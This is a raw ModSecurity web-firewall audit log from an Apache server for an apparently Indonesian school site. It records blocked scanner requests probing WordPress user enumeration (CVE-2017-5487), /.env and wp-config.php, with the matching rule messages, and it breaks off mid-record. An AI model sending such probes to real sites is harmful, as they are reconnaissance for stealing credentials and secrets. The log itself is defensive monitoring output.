--485c983a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.236.12.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.236.12.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --485c983a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --485c983a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747040690672201 3480 (- - -) Stopwatch2: 1747040690672201 3480; combined=1454, p1=463, p2=958, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --485c983a-Z-- --3825cc16-A-- [12/May/2025:16:38:24 +0700] aCHBkBLjIumP119c9pomtwAAABQ 103.236.140.4 35604 103.236.140.4 8181 --3825cc16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.147.247.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.147.247.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3825cc16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3825cc16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747042704750090 3574 (- - -) Stopwatch2: 1747042704750090 3574; combined=1484, p1=497, p2=955, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3825cc16-Z-- --d80d1b45-A-- [12/May/2025:16:46:43 +0700] aCHDgxLjIumP119c9pomxAAAABg 103.236.140.4 35684 103.236.140.4 8181 --d80d1b45-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.155.65.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.155.65.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d80d1b45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d80d1b45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747043203626771 3189 (- - -) Stopwatch2: 1747043203626771 3189; combined=1422, p1=483, p2=907, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d80d1b45-Z-- --c8354f11-A-- [12/May/2025:17:04:31 +0700] aCHHrxLjIumP119c9pom4wAAAAo 103.236.140.4 35870 103.236.140.4 8181 --c8354f11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.135.186.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.135.186.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c8354f11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8354f11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747044271178517 3087 (- - -) Stopwatch2: 1747044271178517 3087; combined=1281, p1=426, p2=819, p3=0, p4=0, p5=36, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8354f11-Z-- --e0fb4021-A-- [12/May/2025:17:08:15 +0700] aCHIjxLjIumP119c9pom8wAAAAc 103.236.140.4 35988 103.236.140.4 8181 --e0fb4021-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.152.158 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.152.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e0fb4021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0fb4021-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747044495087329 822 (- - -) Stopwatch2: 1747044495087329 822; combined=317, p1=281, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0fb4021-Z-- --a23e1a2f-A-- [12/May/2025:17:09:49 +0700] aCHI7RLjIumP119c9pom9QAAAAs 103.236.140.4 35992 103.236.140.4 8181 --a23e1a2f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 83.99.147.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 83.99.147.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a23e1a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a23e1a2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747044589506322 2838 (- - -) Stopwatch2: 1747044589506322 2838; combined=1238, p1=423, p2=786, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a23e1a2f-Z-- --ec703568-A-- [12/May/2025:17:10:57 +0700] aCHJMRLjIumP119c9pom-QAAABM 103.236.140.4 36006 103.236.140.4 8181 --ec703568-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.81.13.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.81.13.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec703568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec703568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747044657443208 3171 (- - -) Stopwatch2: 1747044657443208 3171; combined=1393, p1=462, p2=898, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec703568-Z-- --2f895614-A-- [12/May/2025:18:22:05 +0700] aCHZ3RKpX3ymKhxxBshUiAAAAFU 103.236.140.4 40434 103.236.140.4 8181 --2f895614-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 178.128.207.138 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2f895614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f895614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747048925240063 872 (- - -) Stopwatch2: 1747048925240063 872; combined=397, p1=356, p2=0, p3=0, p4=0, p5=40, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f895614-Z-- --c168ee41-A-- [12/May/2025:18:28:15 +0700] aCHbTxKpX3ymKhxxBshUiwAAAEA 103.236.140.4 40466 103.236.140.4 8181 --c168ee41-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.26.90.247 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.26.90.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: */* --c168ee41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c168ee41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747049295230887 896 (- - -) Stopwatch2: 1747049295230887 896; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c168ee41-Z-- --a260ab36-A-- [12/May/2025:18:44:08 +0700] aCHfCBLjIumP119c9pooNQAAAAg 103.236.140.4 40540 103.236.140.4 8181 --a260ab36-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 165.227.84.14 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a260ab36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a260ab36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747050248970025 780 (- - -) Stopwatch2: 1747050248970025 780; combined=340, p1=299, p2=0, p3=0, p4=0, p5=41, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a260ab36-Z-- --84eb3c12-A-- [12/May/2025:19:15:27 +0700] aCHmX-ll0ld2l7Li0sdWeAAAAIY 103.236.140.4 42344 103.236.140.4 8181 --84eb3c12-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.135.186.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.135.186.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --84eb3c12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84eb3c12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747052127544710 3337 (- - -) Stopwatch2: 1747052127544710 3337; combined=1461, p1=475, p2=949, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84eb3c12-Z-- --c6e35a04-A-- [12/May/2025:19:24:42 +0700] aCHoihLjIumP119c9popPgAAAAU 103.236.140.4 42694 103.236.140.4 8181 --c6e35a04-B-- GET /.well-known/pki-validation/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.79.186.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.79.186.161 X-Forwarded-Proto: http Connection: close --c6e35a04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6e35a04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747052682579994 787 (- - -) Stopwatch2: 1747052682579994 787; combined=307, p1=270, p2=0, p3=0, p4=0, p5=36, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6e35a04-Z-- --3da4936d-A-- [12/May/2025:19:35:40 +0700] aCHrHBKpX3ymKhxxBshV5AAAAEQ 103.236.140.4 44082 103.236.140.4 8181 --3da4936d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.108.115.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.108.115.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3da4936d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3da4936d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747053340174270 2974 (- - -) Stopwatch2: 1747053340174270 2974; combined=1290, p1=424, p2=833, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3da4936d-Z-- --644c5a31-A-- [12/May/2025:19:49:13 +0700] aCHuSRKpX3ymKhxxBshV6AAAAEk 103.236.140.4 44132 103.236.140.4 8181 --644c5a31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.113 Safari/537.36 Vivaldi/2.1.1337.51 Accept-Charset: utf-8 --644c5a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --644c5a31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747054153238401 870 (- - -) Stopwatch2: 1747054153238401 870; combined=342, p1=300, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --644c5a31-Z-- --22606709-A-- [12/May/2025:20:14:40 +0700] aCH0QBLjIumP119c9poquQAAAAo 103.236.140.4 44262 103.236.140.4 8181 --22606709-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --22606709-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22606709-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747055680303122 743 (- - -) Stopwatch2: 1747055680303122 743; combined=286, p1=250, p2=0, p3=0, p4=0, p5=35, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22606709-Z-- --1130e060-A-- [12/May/2025:20:23:28 +0700] aCH2UBLjIumP119c9poqzwAAAAw 103.236.140.4 44378 103.236.140.4 8181 --1130e060-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.255.114.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.255.114.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1130e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1130e060-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747056208727486 3387 (- - -) Stopwatch2: 1747056208727486 3387; combined=1498, p1=495, p2=971, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1130e060-Z-- --faeb8341-A-- [12/May/2025:20:35:57 +0700] aCH5PRKpX3ymKhxxBshV-QAAAE8 103.236.140.4 44408 103.236.140.4 8181 --faeb8341-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.114.252.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.114.252.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --faeb8341-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faeb8341-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747056957271344 3449 (- - -) Stopwatch2: 1747056957271344 3449; combined=1507, p1=476, p2=996, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faeb8341-Z-- --73c94a6b-A-- [12/May/2025:20:58:31 +0700] aCH-hxLjIumP119c9posFgAAAA4 103.236.140.4 48826 103.236.140.4 8181 --73c94a6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.87.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.87.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73c94a6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73c94a6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747058311121933 2353 (- - -) Stopwatch2: 1747058311121933 2353; combined=1323, p1=443, p2=852, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73c94a6b-Z-- --d6f3c26f-A-- [12/May/2025:20:59:03 +0700] aCH-pxKpX3ymKhxxBshX4QAAAFQ 103.236.140.4 50460 103.236.140.4 8181 --d6f3c26f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Gulper Web Bot 0.2.4 